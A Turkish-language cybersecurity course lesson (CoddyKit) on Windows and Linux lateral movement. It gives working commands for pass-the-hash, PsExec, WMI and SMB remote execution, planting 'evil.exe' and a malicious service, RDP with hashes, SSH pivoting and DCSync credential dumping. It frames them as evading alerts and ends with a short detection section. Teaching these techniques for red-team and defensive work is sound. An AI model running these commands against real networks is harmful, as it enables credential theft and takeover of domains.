0Pricing
Cyber Security Academy · Ders

Yanal Hareket Teknikleri

Uyarıları tetiklemeden WMI, PsExec, WinRM ve SMB paylaşımlarıyla ağlar içinde ilerleyin.

Yanal Hareket Teknikleri, CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 3. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.

Yanal Hareket Nedir?

Yanal hareket, saldırganların ilk ele geçirmeden sonra bir ağ içinde adım adım ilerlemek, ilk dayanak noktasından etki alanı denetleyicileri, veritabanları ve yedekleme sistemleri gibi daha değerli hedeflere geçmek için kullandığı teknikler bütünüdür.

Hash ile Geçiş (PtH)

Windows NTLM kimlik doğrulaması, düz metin parola yerine parola karmasının doğrudan kullanılmasına olanak tanır. NTLM karmalarını dökmüş bir saldırgan, karmayı kırmadan diğer sistemlerde kimlik doğrulaması yapabilir.

# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5

# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASH

Bilet ile Geçiş (PtT)

Kerberos biletleri (TGT veya TGS) bellekten çıkarılıp bilet sahibi olarak kimlik doğrulaması yapmak üzere içe aktarılabilir. Altın Bilet saldırıları, KRBTGT karmasını kullanarak TGT'ler oluşturur ve etki alanına sınırsız Kerberos erişimi sağlar.

Uzaktan Kod Çalıştırma: PSExec

psexec (Sysinternals ve Impacket), SMB/yönetici paylaşımları üzerinden uzak Windows ana bilgisayarlarında komutlar çalıştırır. Yönetici kimlik bilgileri gerektirir. Hedefte bir hizmet ikili dosyası oluşturur.

impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexec

WMI ile Yanal Hareket

Windows Management Instrumentation, birçok aracın tespit edebileceği dosyaları oluşturmadan uzaktan kod çalıştırmayı sağlar:

# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")

SMB ve Yönetici Paylaşımları

Windows yönetici paylaşımları (C$, ADMIN$, IPC$), yönetici kimlik bilgileriyle yanal harekete olanak tanır:

# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5

Uzaktan Hizmetler: sc ve at

Uzak sistemlerde hizmetler veya zamanlanmış görevler oluşturun:

# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc

# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"

RDP ve Etkileşimli Oturumlar

RDP (Uzak Masaüstü Protokolü, 3389 numaralı bağlantı noktası) tam etkileşimli erişim sağlar. Saldırganlar çalınmış kimlik bilgileriyle RDP kullanır. Savunma: RDP'yi sıçrama sunucularıyla sınırlandırın, NLA gerektirin ve tüm oturumları günlüğe kaydedin.

# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5

SSH ile Yanal Hareket

Linux ortamlarında SSH, çalınmış anahtarlar veya kimlik bilgileriyle yanal hareket sağlar. Ajan yönlendirmesinin kötüye kullanılması, ele geçirilmiş ana bilgisayarlar üzerinden geçiş yapılmasını sağlar. SSH tünelleri, başka türlü erişilemeyen sistemlere ulaşmak için bağlantı noktalarını yönlendirir.

# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_host

Active Directory Replikasyonu (DCSync)

DCSync, AD replikasyonunu kötüye kullanarak parolaları doğrudan DC'den çeker ve üzerinde kod çalıştırılmasını gerektirmez; bunun için DS-Replication-Get-Changes-All ayrıcalığı gerekir:

# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgt

Yanal Hareketi Tespit Etme

Tespit göstergeleri:

  • Olağandışı Tür 3 (ağ) oturum açmalarıyla birlikte Event 4624 (oturum açma)
  • Uzak ana bilgisayarlarda hizmet oluşturma (Event 7045)
  • İş istasyonları arasındaki SMB bağlantıları
  • Uzak ana bilgisayarlarda WMI işlem oluşturma
  • Anormal hesap davranışı (bir kullanıcının birden fazla makinede oturum açması)

Hızlı Kontrol: Yanal Hareket

Bir saldırganın ele geçirilmiş bir NTLM karmasını kırmadan Windows sistemlerinde kimlik doğrulaması yapmasını hangi teknik sağlar?

Ders Özeti

Yanal hareket, ağ içinde yayılmak için ele geçirilmiş kimlik bilgilerini ve protokolleri kullanır. Temel teknikler: Hash ile Geçiş (NTLM karmasının yeniden kullanımı), Bilet ile Geçiş (Kerberos), uzaktan çalıştırma için PSExec/WMI/SMB ve etki alanı kimlik bilgilerini toplamak için DCSync. Tespit: olağandışı ağ oturum açmaları (Event 4624), uzak hizmet oluşturma (Event 7045) ve iş istasyonları arasındaki SMB trafiği.

Sıkça Sorulan Sorular

“Yanal Hareket Teknikleri” dersi ücretsiz mi?

Evet — “Yanal Hareket Teknikleri” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.

“Yanal Hareket Teknikleri” dersinde ne öğreneceğim?

Uyarıları tetiklemeden WMI, PsExec, WinRM ve SMB paylaşımlarıyla ağlar içinde ilerleyin. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 3. dersidir.

“Yanal Hareket Teknikleri” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. C2 Çerçeveleri: Cobalt Strike ve Sliver
  2. Living-Off-the-Land İkili Dosyaları (LOLBins)
  3. Yanal Hareket Teknikleri
  4. Kırmızı Ekip Raporu Yazma
← Cyber Security Academy Sayfasına Dön